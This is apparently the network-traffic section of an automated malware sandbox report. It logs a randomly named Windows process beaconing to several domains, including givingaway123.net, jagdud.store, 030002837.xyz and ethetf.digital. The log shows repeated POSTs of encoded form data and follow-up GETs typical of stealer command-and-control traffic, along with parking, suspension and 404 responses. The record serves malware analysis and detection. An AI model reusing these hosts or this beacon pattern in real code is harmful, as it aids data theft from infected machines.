                                                                                                                          Oct 21, 2024 17:26:32.176819086 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
Oct 21, 2024 17:26:32.176856995 CEST | 424 | IN
Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
Oct 21, 2024 17:26:32.177584887 CEST | 1236 | IN
Data Ascii: main registrants email addresses, even after incoming transfers.</li><li><i class="fa fa-play"></i><span class="bold">Someone has complained about the accuracy of the data provided for publication in the WHOIS, triggering a re-verifi
Oct 21, 2024 17:26:32.177620888 CEST | 1236 | IN
Data Ascii: link and your domain will be unsuspended within 30 minutes.Please make sure to check your spam folder if you cannot find that mail.</p><p><span class="bold">You can request to resend the verification email through your domain prov
Oct 21, 2024 17:26:32.178761005 CEST | 1236 | IN
Data Ascii: s="text-center col-sm-8 col-sm-offset-2"><div class="slice"><h2>Frequently Asked Questions</h2><div class="icon_left"><span class="fa fa-user-circle"></span></div><div class="slice_content"><p><span class=
Oct 21, 2024 17:26:32.178801060 CEST | 1108 | IN
Data Ascii: an update to your data.</p><p><span class="bold">How can I reactivate my domain and remove the suspension?</span><br>This requires the completion of the verification process. You can resend the verification mail through your doma


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 57337 | 103.224.182.242 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:38.162096977 CEST | 763 | OUT | POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=ffTojLdnB/BTcUqLzYhA/KljWnInz2fqjtbGAmTO/c2xOur2cv0tcxwJ2XNVAfoO6Sc+FWt9OktyD0qD6xSz8NGHxb3pXSfbSFWd9dlKMEuDAoxNfpdEwWn+jV2u3MMX3169UBvIXjCrc9mZ1fR5FRQhJycms7I2GSgKBPnfJfT7rHj32w//Teom0wtEFNnMtDV7zqwYsFC/
Oct 21, 2024 17:26:38.702219009 CEST | 877 | IN | HTTP/1.1 200 OK
date: Mon, 21 Oct 2024 15:26:38 GMT
server: Apache
set-cookie: __tad=1729524398.8660091; expires=Thu, 19-Oct-2034 15:26:38 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 57338 | 103.224.182.242 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:40.708942890 CEST | 787 | OUT | POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/OixOOb2dtctfxwJxnNQevoR6SRDFXR9Og9yD1aD6C609dGB973nYyfbSFWd9cBkME2DAYhNcMpH+2n5zF2uzMMb316bUADuXhKrc92ZyOR4eBQnWidMt45YPxB0KNm4IuTFqxitqD/cBOIk0y12FtnmvDt7h98/jxnc0urUww4OFOxuUw/cmbEtcA==
Oct 21, 2024 17:26:41.252935886 CEST | 877 | IN | HTTP/1.1 200 OK
date: Mon, 21 Oct 2024 15:26:41 GMT
server: Apache
set-cookie: __tad=1729524401.7366602; expires=Thu, 19-Oct-2034 15:26:41 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 57339 | 103.224.182.242 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:43.255112886 CEST | 1800 | OUT | POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/O6xOf72dLUtexwJynNRevpN6RhHFXdXOmhyCTGD4z600dGBiL3mXSeGSFGR9cRkME2DAapNLJdH82n+jV2q3MNM31SlUAHYQRqrFZqZ3854DRQlVidUt41bPxcNKMDdIsPFo3z2/iDcfukfrT9qC9/VoidYhvtMmF7StY3J6AELSM5DS36rlfJoHfHkmH2Q2vp4AWdCjxovchZB5PRkvhaok6rrnTQGd79HLi0fhRPkgonycjDyMUMkZRjklsAJpc6vs8lJY/kAoAjVdo+zABmTHU8GlXHAYfwIKxB/OCS5Jdut3Blp/NbQUx1goOnZ3QR3WWxNJqQGnM8/qNSYm0Qpfb9wQfFdLN5BcAzFDv42xvsQm3hXsxfrZ6s2U/AYhIhk+O6BO3k8xJ1d19xK4hPpmg9tCDfA0E3wGgUarqkEjZ6auGd9VgRjN5ULQLZ6XMfGly5aOY1TPUb9yJH3Kowaqh02rdhLAeIugy8ci+0oMwUd4C458AtEkyD4MiC/DXmL3WF+uKzCFd5rGooDb9tfPgb4Phx1rbPI4pWjwOcix9v/hOb1go1FGLtRigKEFx7MBnejPVdCJCDko/hOXPFZmNwpwr7l+L0yqhVfLrKhHjkKb8qy7MFK3l+Z0p3ExDUDFrGF8NjQ3e9z8zXP+cE9DaOFAOnWnA7wuROdldKQLtGWX+iayA/I+byQxid6aZTihD61AcxBmeO54Nh4aIORzRmK+h6giW0hzIi9OOHVDXGSdMlW3tGtN/MruDaHB4XScOsapuOKIGH1qUnh5DX4/JAjgHKQH2WW6+sfHwaWhYjpl31r8pUgXvxWXSR3NPi4ESeG/O+inB2J7zKRgz3o/I/LjW3RrBOR4Uc+4mD6zbLwy9FfAhTygmPoKbaaEwJRK0q95a+f+BnfXX88hWNsHMNs+qmB1nYIIJDgTywpKOurqBWXYsMLQsxD6SnSr2ZySN [TRUNCATED]
Oct 21, 2024 17:26:43.792601109 CEST | 877 | IN | HTTP/1.1 200 OK
date: Mon, 21 Oct 2024 15:26:43 GMT
server: Apache
set-cookie: __tad=1729524403.5845140; expires=Thu, 19-Oct-2034 15:26:43 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 57340 | 103.224.182.242 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:45.797872066 CEST | 500 | OUT | GET /1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34= HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:46.344805956 CEST | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 21 Oct 2024 15:26:46 GMT
server: Apache
set-cookie: __tad=1729524406.1551893; expires=Thu, 19-Oct-2034 15:26:46 GMT; Max-Age=315360000
vary: Accept-Encoding
content-length: 1569
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: <html><head><title>givingaway123.net</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style>
Oct 21, 2024 17:26:46.344855070 CEST | 605 | IN
Data Ascii: </head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 57341 | 209.74.64.187 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:51.472347975 CEST | 748 | OUT | POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=mrFM9RmSUx+2nMoPSBNnJIP7YQi1AJ8U4LqqyC2ucNfYSlscDJdsrscaMDkk3LFBi9fzV57NsS+fH9ChSltTevGEjMWvLtO98WdWhif3uwxHuGmcnQRzKJjowzSC0iv10y6VqLvyhfVPuiWGir2dSv/15Kg3gxGCQX0YWXDBarkxsrAzwYvNnswttafgWG9azwMGr3RAd6MC
Oct 21, 2024 17:26:52.019298077 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Oct 2024 15:26:51 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 57342 | 209.74.64.187 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:54.017167091 CEST | 772 | OUT | POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/7YVAocRb1smMcaVzkl9rFai9CMV7/NsS6fH8yhTW1SdfGC6cWtVdO98WdWhiaSuxZHu3WcoRR8UZjr6TSC5Cv50y6NqOHYhd9Pun6Gi62Sbv//0qhjrkrRSh5ufEv6bcgXpdBpsrvu18QvtYHSWm9wxw0G5gdnSOphuloiyHfwT0ZmJWSrhlD+/w==
Oct 21, 2024 17:26:54.578855038 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Oct 2024 15:26:54 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 57343 | 209.74.64.187 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:56.571077108 CEST | 1785 | OUT | POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI= [TRUNCATED]
Oct 21, 2024 17:26:57.162192106 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Oct 2024 15:26:57 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 57344 | 209.74.64.187 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:59.111083031 CEST | 495 | OUT | GET /qxse/?qFHlI=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85K9GP26O7G/CGnyNUhwPTmghA/Wmfri1zUJzRsgXk3AqKswS13LU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:59.678983927 CEST | 548 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Oct 2024 15:26:59 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 57347 | 65.21.196.90 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:27:04.992007971 CEST | 751 | OUT | POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=/3pi4VdoD972Ig+YfpPLcSeYxDH5AU02mv8DMfIKlkYg74puDGHXRXECSvrJ65ANBsGX2kf3/H/AJJkcd1RMdk20mB5fkEoZD/cqftbCg1drgjG6wMlznh9kOyPy8aqZ3WB2jP//l2H/dX8ldxhEuCaUiX3C3T1M3Zc91BQwfYDN4u1B+5fnn8gBvdBiDBUSPcusOdXrNQJc
Oct 21, 2024 17:27:05.599025965 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Mon, 21 Oct 2024 15:27:05 GMT
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.6  57348        65.21.196.90    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:07.541938066 CEST  775                OUT        POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWMg7ZZuCCTXCnECHfrM0ZA8Bsbi2mb3/GbAJMAcdCFNb02Mqh5d7UoZD/cqfp7og1VrgT26xtl0kh9reiPy4arx3WBUjOjBly3/dWMldAhLkCbfmX3M4ScLp7hB9hUjLZXv040biKfE1sADvfZQDhU4NcWscKbMCks/+TdAAaUOau7c4MXafDCGvA==
Oct 21, 2024 17:27:08.139972925 CEST  1032               IN         HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Mon, 21 Oct 2024 15:27:08 GMT
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.6  57349        65.21.196.90    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:10.086639881 CEST  1788               OUT        POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI= [TRUNCATED]
Oct 21, 2024 17:27:10.688008070 CEST  1032               IN         HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Mon, 21 Oct 2024 15:27:10 GMT
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.6  57350        65.21.196.90    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:12.627065897 CEST  496                OUT        GET /y045/?qFHlI=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopZ2qqizp83SA4VvMOfKjYwWha+waZ/9hnzA5UcC/NzqTplHtuhYQ=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:27:13.233931065 CEST  1032               IN         HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Mon, 21 Oct 2024 15:27:13 GMT
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.6  57351        3.33.130.190    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:18.544778109 CEST  754                OUT        POST /m7sk/ HTTP/1.1
Host: www.ethetf.digital
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.ethetf.digital
Referer: http://www.ethetf.digital/m7sk/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4FGcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmsLIcWFN2JV2jEHK/gOcygpn9zvvfPfukWoWbhOJpBmX


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.6  57352        3.33.130.190    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:21.084517002 CEST  778                OUT        POST /m7sk/ HTTP/1.1
Host: www.ethetf.digital
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.ethetf.digital
Referer: http://www.ethetf.digital/m7sk/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
